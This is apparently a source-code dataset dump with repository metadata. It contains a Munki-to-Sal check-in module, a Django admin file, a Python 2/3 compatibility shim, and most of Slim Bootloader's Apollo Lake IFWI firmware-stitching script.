else:
print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)')
def process(self, event):
if self.verbose:
print("\nProcessing run:lumi:event %d:%d:%d" % (
event.input.eventAuxiliary().id().run(),
event.input.eventAuxiliary().id().luminosityBlock(),
event.input.eventAuxiliary().id().event()))
if not self.useLumiBlocks:
self.readCollections( event.input )
self.count.inc('All Events')
if self.cfg_comp.isMC:
self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight())
return True
| true
| true
|
f705c5f7c4974cac5efeddeb4787732c80472742
| 114
|
py
|
Python
|
blog/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
blog/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
blog/admin.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
from django.contrib import admin
from .models import blog
# Register your models here.
admin.site.register(blog)
| 19
| 32
| 0.798246
|
from django.contrib import admin
from .models import blog
admin.site.register(blog)
| true
| true
|
f705c6c1705b01df89f15b731ab6fc18b82c61cd
| 6,579
|
py
|
Python
|
payload/usr/local/sal/checkin_modules/munki_checkin.py
|
forvitinn/sal-scripts
|
585934f641732b29c0f0be9072b32606ccc8e96a
|
[
"Apache-2.0"
] | 23
|
2015-08-04T22:56:55.000Z
|
2022-02-14T12:41:23.000Z
|
payload/usr/local/sal/checkin_modules/munki_checkin.py
|
forvitinn/sal-scripts
|
585934f641732b29c0f0be9072b32606ccc8e96a
|
[
"Apache-2.0"
] | 40
|
2016-01-28T17:29:52.000Z
|
2021-11-12T04:22:48.000Z
|
payload/usr/local/sal/checkin_modules/munki_checkin.py
|
forvitinn/sal-scripts
|
585934f641732b29c0f0be9072b32606ccc8e96a
|
[
"Apache-2.0"
] | 45
|
2015-08-04T00:12:28.000Z
|
2022-02-21T20:06:40.000Z
|
#!/usr/local/sal/Python.framework/Versions/Current/bin/python3
import datetime
import pathlib
import plistlib
import sys
import sal
sys.path.insert(0, "/usr/local/munki")
from munkilib import munkicommon
__version__ = "1.2.0"
def main():
# If we haven't successfully submitted to Sal, pull the existing
# munki section rather than start from scratch, as we want to
# keep any install/removal history that may be there.
munki_submission = sal.get_checkin_results().get("munki", {})
munki_report = get_managed_install_report()
extras = {}
extras["munki_version"] = munki_report["MachineInfo"].get("munki_version")
extras["manifest"] = munki_report.get("ManifestName")
extras["runtype"] = munki_report.get("RunType", "custom")
munki_submission["extra_data"] = extras
munki_submission["facts"] = {
"checkin_module_version": __version__,
"RunType": munki_report["RunType"],
"StartTime": munki_report["StartTime"],
"EndTime": munki_report["EndTime"],
}
if munki_report.get("Conditions"):
for condition, value in munki_report["Conditions"].items():
# Join lists of strings into a comma-delimited string, as
# the server wants just text.
try:
if hasattr(value, "append"):
value = ", ".join(value)
except Exception as e:
# We god something weird from a condtion that probably wouldn't work anyway
continue
munki_submission["facts"][condition] = value
munki_submission["messages"] = []
for key in ("Errors", "Warnings"):
for msg in munki_report[key]:
# We need to drop the final 'S' to match Sal's message types.
munki_submission["messages"].append(
{"message_type": key.upper()[:-1], "text": msg}
)
now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat()
# Process managed items and update histories.
munki_submission["managed_items"] = {}
optional_manifest = get_optional_manifest()
for item in munki_report.get("ManagedInstalls", []):
submission_item = {"date_managed": now}
submission_item["status"] = "PRESENT" if item["installed"] else "PENDING"
version_key = (
"version_to_install" if not item["installed"] else "installed_version"
)
version = item[version_key]
name = f'{item["name"]} {version}'
submission_item["name"] = name
# Pop off these two since we already used them.
item.pop("name")
item.pop("installed")
item["type"] = "ManagedInstalls"
self_serve = (
"True" if name in optional_manifest.get("managed_installs", []) else "False"
)
item["self_serve"] = self_serve
submission_item["data"] = item
munki_submission["managed_items"][name] = submission_item
for item in munki_report.get("managed_uninstalls_list", []):
submission_item = {"date_managed": now, "status": "ABSENT"}
self_serve = (
"True"
if name in optional_manifest.get("managed_uninstalls", [])
else "False"
)
submission_item["data"] = {
"self_serve": self_serve,
"type": "ManagedUninstalls",
}
munki_submission["managed_items"][item] = submission_item
# Process InstallResults and RemovalResults into update history
for report_key in ("InstallResults", "RemovalResults"):
for item in munki_report.get(report_key, []):
# Skip Apple software update items.
if item.get("applesus"):
continue
# Construct key; we pop the name off because we don't need
# to submit it again when we stuff `item` into `data`.
name = f'{item.pop("name")} {item["version"]}'
submission_item = munki_submission["managed_items"].get(
name, {"name": name}
)
if item.get("status") != 0:
# Something went wrong, so change the status.
submission_item["status"] = "ERROR"
if "data" in submission_item:
submission_item["data"].update(item)
else:
submission_item["data"] = item
if "type" not in submission_item["data"]:
submission_item["data"]["type"] = (
"ManagedInstalls"
if report_key == "InstallResults"
else "ManagedUninstalls"
)
# This UTC datetime gets converted to a naive datetime by
# plistlib. Fortunately, we can just tell it that it's UTC.
submission_item["date_managed"] = (
item["time"].replace(tzinfo=datetime.timezone.utc).isoformat()
)
munki_submission["managed_items"][name] = submission_item
sal.set_checkin_results("Munki", munki_submission)
def get_managed_install_report():
"""Return Munki ManagedInstallsReport.plist as a plist dict.
Returns:
ManagedInstalls report for last Munki run as a plist
dict, or an empty dict.
"""
# Checks munki preferences to see where the install directory is set to.
managed_install_dir = munkicommon.pref("ManagedInstallDir")
# set the paths based on munki's configuration.
managed_install_report = (
pathlib.Path(managed_install_dir) / "ManagedInstallReport.plist"
)
try:
munki_report = plistlib.loads(managed_install_report.read_bytes())
except (IOError, plistlib.InvalidFileException):
munki_report = {}
if "MachineInfo" not in munki_report:
munki_report["MachineInfo"] = {}
return sal.unobjctify(munki_report)
def get_optional_manifest():
"""Return Munki SelfServeManifest as a plist dict.
Returns:
SelfServeManifest for last Munki run as a plist
dict, or an empty dict.
"""
# Checks munki preferences to see where the install directory is set to.
managed_install_dir = munkicommon.pref("ManagedInstallDir")
# set the paths based on munki's configuration.
optional_manifest_path = (
pathlib.Path(managed_install_dir) / "manifests/SelfServeManifest"
)
try:
optional_manifest = plistlib.loads(optional_manifest_path.read_bytes())
except (IOError, plistlib.InvalidFileException):
optional_manifest = {}
return optional_manifest
if __name__ == "__main__":
main()
| 35.370968
| 91
| 0.622739
|
import datetime
import pathlib
import plistlib
import sys
import sal
sys.path.insert(0, "/usr/local/munki")
from munkilib import munkicommon
__version__ = "1.2.0"
def main():
# munki section rather than start from scratch, as we want to
# keep any install/removal history that may be there.
munki_submission = sal.get_checkin_results().get("munki", {})
munki_report = get_managed_install_report()
extras = {}
extras["munki_version"] = munki_report["MachineInfo"].get("munki_version")
extras["manifest"] = munki_report.get("ManifestName")
extras["runtype"] = munki_report.get("RunType", "custom")
munki_submission["extra_data"] = extras
munki_submission["facts"] = {
"checkin_module_version": __version__,
"RunType": munki_report["RunType"],
"StartTime": munki_report["StartTime"],
"EndTime": munki_report["EndTime"],
}
if munki_report.get("Conditions"):
for condition, value in munki_report["Conditions"].items():
# Join lists of strings into a comma-delimited string, as
# the server wants just text.
try:
if hasattr(value, "append"):
value = ", ".join(value)
except Exception as e:
# We god something weird from a condtion that probably wouldn't work anyway
continue
munki_submission["facts"][condition] = value
munki_submission["messages"] = []
for key in ("Errors", "Warnings"):
for msg in munki_report[key]:
munki_submission["messages"].append(
{"message_type": key.upper()[:-1], "text": msg}
)
now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat()
# Process managed items and update histories.
munki_submission["managed_items"] = {}
optional_manifest = get_optional_manifest()
for item in munki_report.get("ManagedInstalls", []):
submission_item = {"date_managed": now}
submission_item["status"] = "PRESENT" if item["installed"] else "PENDING"
version_key = (
"version_to_install" if not item["installed"] else "installed_version"
)
version = item[version_key]
name = f'{item["name"]} {version}'
submission_item["name"] = name
# Pop off these two since we already used them.
item.pop("name")
item.pop("installed")
item["type"] = "ManagedInstalls"
self_serve = (
"True" if name in optional_manifest.get("managed_installs", []) else "False"
)
item["self_serve"] = self_serve
submission_item["data"] = item
munki_submission["managed_items"][name] = submission_item
for item in munki_report.get("managed_uninstalls_list", []):
submission_item = {"date_managed": now, "status": "ABSENT"}
self_serve = (
"True"
if name in optional_manifest.get("managed_uninstalls", [])
else "False"
)
submission_item["data"] = {
"self_serve": self_serve,
"type": "ManagedUninstalls",
}
munki_submission["managed_items"][item] = submission_item
# Process InstallResults and RemovalResults into update history
for report_key in ("InstallResults", "RemovalResults"):
for item in munki_report.get(report_key, []):
# Skip Apple software update items.
if item.get("applesus"):
continue
# Construct key; we pop the name off because we don't need
name = f'{item.pop("name")} {item["version"]}'
submission_item = munki_submission["managed_items"].get(
name, {"name": name}
)
if item.get("status") != 0:
submission_item["status"] = "ERROR"
if "data" in submission_item:
submission_item["data"].update(item)
else:
submission_item["data"] = item
if "type" not in submission_item["data"]:
submission_item["data"]["type"] = (
"ManagedInstalls"
if report_key == "InstallResults"
else "ManagedUninstalls"
)
submission_item["date_managed"] = (
item["time"].replace(tzinfo=datetime.timezone.utc).isoformat()
)
munki_submission["managed_items"][name] = submission_item
sal.set_checkin_results("Munki", munki_submission)
def get_managed_install_report():
# Checks munki preferences to see where the install directory is set to.
managed_install_dir = munkicommon.pref("ManagedInstallDir")
# set the paths based on munki's configuration.
managed_install_report = (
pathlib.Path(managed_install_dir) / "ManagedInstallReport.plist"
)
try:
munki_report = plistlib.loads(managed_install_report.read_bytes())
except (IOError, plistlib.InvalidFileException):
munki_report = {}
if "MachineInfo" not in munki_report:
munki_report["MachineInfo"] = {}
return sal.unobjctify(munki_report)
def get_optional_manifest():
managed_install_dir = munkicommon.pref("ManagedInstallDir")
optional_manifest_path = (
pathlib.Path(managed_install_dir) / "manifests/SelfServeManifest"
)
try:
optional_manifest = plistlib.loads(optional_manifest_path.read_bytes())
except (IOError, plistlib.InvalidFileException):
optional_manifest = {}
return optional_manifest
if __name__ == "__main__":
main()
| true
| true
|
f705c7a4e86112d7fbf69a0db1bd54f293460d18
| 200
|
py
|
Python
|
jscaller/_compatiable.py
|
ZSAIm/PyJSCaller
|
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
|
[
"Apache-2.0"
] | 31
|
2019-05-06T03:07:58.000Z
|
2022-02-09T02:00:46.000Z
|
jscaller/_compatiable.py
|
zackmark29/PyJSCaller
|
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
|
[
"Apache-2.0"
] | 1
|
2019-07-05T12:43:34.000Z
|
2019-07-26T08:22:19.000Z
|
jscaller/_compatiable.py
|
zackmark29/PyJSCaller
|
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
|
[
"Apache-2.0"
] | 10
|
2019-05-07T06:35:21.000Z
|
2021-09-27T02:48:40.000Z
|
__all__ = ["PY2", "PY3"]
import sys
if sys.version_info[0] == 2:
PY2 = True
PY3 = False
elif sys.version_info[0] == 3:
PY2 = False
PY3 = True
else:
PY2 = False
PY3 = False
| 12.5
| 30
| 0.56
|
__all__ = ["PY2", "PY3"]
import sys
if sys.version_info[0] == 2:
PY2 = True
PY3 = False
elif sys.version_info[0] == 3:
PY2 = False
PY3 = True
else:
PY2 = False
PY3 = False
| true
| true
|
f705c7f93432895a83a22e63702790a8a3602602
| 25,944
|
py
|
Python
|
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
|
aimanrosli23/slimbootloader
|
bce49fbc5ac125cccf4f647e786409f49a026769
|
[
"BSD-2-Clause-NetBSD",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"MIT",
"BSD-2-Clause-Patent"
] | 1
|
2022-03-04T18:23:35.000Z
|
2022-03-04T18:23:35.000Z
|
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
|
aimanrosli23/slimbootloader
|
bce49fbc5ac125cccf4f647e786409f49a026769
|
[
"BSD-2-Clause-NetBSD",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"MIT",
"BSD-2-Clause-Patent"
] | null | null | null |
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
|
aimanrosli23/slimbootloader
|
bce49fbc5ac125cccf4f647e786409f49a026769
|
[
"BSD-2-Clause-NetBSD",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"MIT",
"BSD-2-Clause-Patent"
] | null | null | null |
## @ StitchLoader.py
# This is a python stitching script for Slim Bootloader APL build
#
# Copyright (c) 2018 - 2022, Intel Corporation. All rights reserved. <BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
import os
import re
import sys
import struct
import argparse
import zipfile
import shutil
from ctypes import *
from subprocess import check_output
from functools import reduce
sys.dont_write_bytecode = True
sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../'))
if not os.path.exists (sblopen_dir):
sblopen_dir = os.getenv('SBL_SOURCE', '')
sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools'))
try:
from IfwiUtility import *
except ImportError:
err_msg = "Cannot find IfwiUtility module!\n"
err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder."
raise ImportError(err_msg)
extra_usage_txt = \
"""This script creates a new Apollo Lake Slim Bootloader IFWI image basing
on an existing IFWI base image. Please note, this stitching method will work
only if Boot Guard in the base image is not enabled, and the silicon is not
fused with Boot Guard enabled.
Please follow steps below:
1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform,
such as MinnowBoard 3, LeafHill, etc. The URL is below:
https://firmware.intel.com/projects/minnowboard3
Alternatively, the original IFWI image from the onboard SPI flash can be
read out as the base image too.
2. Build Slim Bootloader source tree and generate a stitching ZIP package.
The generated ZIP package is located at:
$(WORKSPACE)/Outputs/apl/Stitch_Components.zip
3. Stitch to create a new IFWI image.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s
Stitch_Components.zip -o SlimBoot.bin
4. Optionally, to view the flash layout for an given IFWI image,
specify '-i' option only.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin
"""
FILE_ALIGN = 0x1000
class IFWI_MANIPULATE:
def add_component (self, root, path, before = '$', file_path = ''):
nodes = path.split('/')
parent_path = '/'.join(nodes[:-1])
dir_comp = IFWI_PARSER.locate_component (root, parent_path)
if not dir_comp:
print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
return -1
if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
print ('Can only add FILE type !')
return -2
index = None
if before == '$':
# Add to end
index = len(dir_comp.child)
elif before == '^':
# Add to top
index = 0
else:
for idx, file in enumerate(dir_comp.child):
if before == file.name:
index = idx
if index is None:
print ('Cannot find FILE %s !' % before)
return -3
else:
length = os.path.getsize(file_path) if file_path else 0x1000
comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length)
comp.set_data (file_path)
dir_comp.add_child (comp, index)
return 0
def remove_component (self, root, path):
nodes = path.split('/')
parent_path = '/'.join(nodes[:-1])
dir_comp = IFWI_PARSER.locate_component (root, parent_path)
if not dir_comp:
print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
return -1
if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
print ('Can only replace FILE type !')
return -2
index = None
for idx, file in enumerate(dir_comp.child):
if file.name == nodes[-1]:
index = idx
break
if index is None:
print ('Cannot find FILE %s !' % path)
return -3
else:
del dir_comp.child[index]
return 0
def replace_component (self, root, path, file_path):
comp = IFWI_PARSER.locate_component (root, path)
if not comp:
print ('Cannot find FILE %s !' % path)
return -1
if comp.type != COMPONENT.COMP_TYPE['FILE']:
print ('Can only replace FILE type !' % path)
return -2
comp.length = os.path.getsize(file_path) if file_path else 0x1000
if file_path:
comp.set_data (file_path)
return 0
def copy_component (self, root, path, ifwi_data):
print ("COPY BP0 BPDT to BP1 BPDT ...")
# Backup BP0 BPDT and BP1 SBPDT
bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1')
bp0bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT')
bp1bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT')
bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT')
bp0bpdt_data = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset + bp0bpdt.length])
bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length])
# Copy to BP0 BPDT to BP1 BPDT
bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length
ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data
# Append original BP1 SBPDT
bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length
ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data
padding = bp1.offset + bp1.length - bp1sbpdt_end_offset
if padding < 0:
print ('Insufficiant space in BP1 partition !')
return -1
ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding
# Fix Sbpdt length in BP1 BPDT
offset = bp1bpdt.offset
bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
offset += sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
if "BpdtSbpdt" == str(bpdt_entry.type):
bpdt_entry.sub_part_size = bp1sbpdt.length
offset += sizeof(BPDT_ENTRY)
# Fix Sbpdt headers
offset = bp1sbpdt_offset
bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
offset += sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length)
offset += sizeof(BPDT_ENTRY)
print ("Done!")
return 0
def create_dir_data (self, dir, ifwi_data):
# Claculate new DIR length and creaet new DIR data
support_list = ["BpdtIbb", "BpdtObb"]
if dir.name not in support_list:
raise Exception ('Only %s are supported !' % ' '.join(support_list))
adjust = True
offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset)
dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER))
for idx, comp in enumerate(dir.child):
delta = 0
parts = os.path.splitext(comp.name)
if len(parts) > 1 and parts[1] in ['.man', '.met']:
align = 1
elif comp.name in ['IPAD', 'OPAD']:
align = 0x40
else:
align = FILE_ALIGN
delta = dir.offset & (FILE_ALIGN - 1)
next_offset = ((offset + delta + align - 1) & ~(align - 1))
count = next_offset - offset
if adjust:
adjust = False
count -= delta
dir_data.extend(b'\xff' * count)
comp_data = comp.get_data()
if comp_data:
dir_data.extend(comp_data)
else:
dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length])
sub_dir = SUBPART_DIR_ENTRY()
sub_dir.entry_name = comp.name.encode()
sub_dir.entry_offset = next_offset - delta
sub_dir.entry_size = comp.length
sub_dir.reserved1 = 0
sub_dir.reserved2 = 0
entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir)
next_offset += comp.length
offset = next_offset
align = FILE_ALIGN
next_offset = ((offset + align - 1) & ~(align - 1))
dir_data.extend(b'\xff' * (next_offset - offset))
# Update checksum
sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data)
sub_dir_hdr.num_of_entries = len(dir.child)
sub_dir_hdr.checksum = 0
dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
length = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
sum_buf = (c_uint8 * length).from_buffer_copy(dir_data)
sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF
dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1)
if remaining:
# Not page aligned, add padding
dir_data.extend(b'\xff' * (FILE_ALIGN - remaining))
return dir_data
def refresh_ifwi_for_dir (self, dir, ifwi_data):
# Claculate new DIR length and creaet new DIR data
dir_data = self.create_dir_data (dir, ifwi_data)
length = len (dir_data)
adjust_length = length - dir.length
if (dir.offset + length) & (FILE_ALIGN - 1):
print ('DIR total size needs to be 4KB aligned !')
# Remember original SBPDT offset
org_bpdt_offset = dir.parent.parent.child[0].offset
org_sbpdt_offset = dir.parent.parent.child[1].offset
# Adjust offset and size for peer and up level in tree
old_dir = dir
while dir.type != COMPONENT.COMP_TYPE['BP']:
for each in dir.parent.child:
if each.offset > dir.offset:
each.offset += adjust_length
dir.length += adjust_length
dir = dir.parent
dir = old_dir
# Update parent BPDT header info in IFWI data
parent = dir.parent
bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset)
base = parent.offset + sizeof(BPDT_HEADER)
found = False
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY))
comps = [x for x in parent.child if x.name == str(bpdt_entry.type)]
if len(comps) == 0:
continue
if len(comps) > 1:
raise Exception ('Found duplicated DIR %s !', bpdt_entry.type)
bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset
if dir.name == str(bpdt_entry.type):
bpdt_entry.sub_part_size = length
found = True
if not found:
raise Exception ('Could not find DIR %s !', dir.name)
# Update SBPDT DIR header in IFWI data
bp_comp = parent.parent
if parent.name == 'BPDT':
bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset)
bpdt_hdr.xor_sum = 0
base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
bpdt_entry.sub_part_offset += adjust_length
if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
raise Exception ('Insufficiant space in layout !')
else:
# 'SBPDT', update length in BPDT
bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset)
bpdt_hdr.xor_sum = 0
base_offset = org_bpdt_offset + sizeof(BPDT_HEADER)
for idx in range(bpdt_hdr.desc_cnt):
bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
if str(bpdt_entry.type) == "BpdtSbpdt":
bpdt_entry.sub_part_size += adjust_length
if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
raise Exception ('Insufficiant space in layout !')
# Generate actual final IFWI Data
if adjust_length > 0:
ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \
ifwi_data[bp_comp.offset + bp_comp.length:]
else:
adjust_length = -adjust_length
ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \
b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:]
return 0
def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'):
print ('%s %s ...' % (action, path))
root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
ifwi_op = IFWI_MANIPULATE()
if action == "REMOVE":
ret = ifwi_op.remove_component (root, path)
elif action == "ADD":
ret = ifwi_op.add_component (root, path, before, file_name)
elif action == "REPLACE":
ret = ifwi_op.replace_component (root, path, file_name)
elif action == "COPY":
ret = ifwi_op.copy_component (root, 'IFWI/BIOS/BP0/BPDT', ifwi_data)
else:
ret = -100
if ret == 0 and path:
dir_path = '/'.join(path.split('/')[:-1])
dir = IFWI_PARSER.locate_component (root, dir_path)
ifwi_op.refresh_ifwi_for_dir (dir, ifwi_data)
print ('done!')
return ret
def patch_flash_map (image_data, platform_data = 0xffffffff):
comp_bpdt_dict = {
b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD",
b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB",
b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD",
b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR",
b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD",
b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR",
b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD",
b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD",
b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH",
b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP",
b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB",
b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB",
b'SG1A' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL",
b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met",
}
print ("Patching Slim Bootloader Flash Map table ...")
output_image_data = image_data
ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data)
if not ifwi:
return -1
pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD'])
if not pld:
comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD"
bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0')
bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1')
if not bp0 or not bp1:
return -2
# Locate FlashMap offset
for part in range(2):
path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part)
comp = IFWI_PARSER.locate_component (ifwi, path)
if not comp:
if part == 0:
raise Exception("Cannot locate %s !" % path)
else:
continue
stage1AOffset = comp.offset
stage1ALength = comp.length
temp = stage1AOffset + stage1ALength - 8
c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data
fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF
fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off)
entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC)
fla_map_str.romsize = bp0.length + bp1.length
if part == 1:
fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION']
for idx in range (entry_num):
desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
path = comp_bpdt_dict[desc.sig]
if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']):
path = path.replace("BP0", "BP1")
if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']):
desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP']
if desc.sig == b'RSVD':
desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset
continue
comp = IFWI_PARSER.locate_component (ifwi, path)
if not comp:
if desc.sig == b'KEYH':
continue
raise Exception("Cannot locate component '%s' in BPDT !" % path)
if (desc.size == 0) and (desc.offset == 0):
desc.size = comp.length
desc.offset = comp.offset - bp0.offset
continue
if desc.size != comp.length and comp.name != 'FB':
raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig])
if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0):
raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \
"please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" % (comp_bpdt_dict[desc.sig], comp.offset))
desc.offset = comp.offset - bp0.offset
# Last 4k in bios region is reserved for bootloader, throw Exception if any component falls in that range
if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length):
raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig])
limit = bp1.offset + bp1.length - bp0.offset - 0x40000
for idx in range (entry_num):
desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
if desc.sig == b'RSVD':
continue
# Last 256K flash space (4GB - 256KB to 4GB) is remapped to CSME read-only SRAM on APL
# Directly access is not available.
if desc.offset >= limit or desc.offset + desc.size > limit:
print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part))
print ("Flash map was patched successfully!")
return 0
def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir):
redundant_payload = True
ifwi_data = bytearray (get_file_data (ifwi_in))
root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
if not root:
raise Exception ('Invalid IFWI input image format !')
# Verify if Boot Guard is enabled or not
comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType")
if not comp:
raise Exception ('Unsupported base image format !')
data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32]
if (data[0] & 0x0F) != 0x00:
raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !')
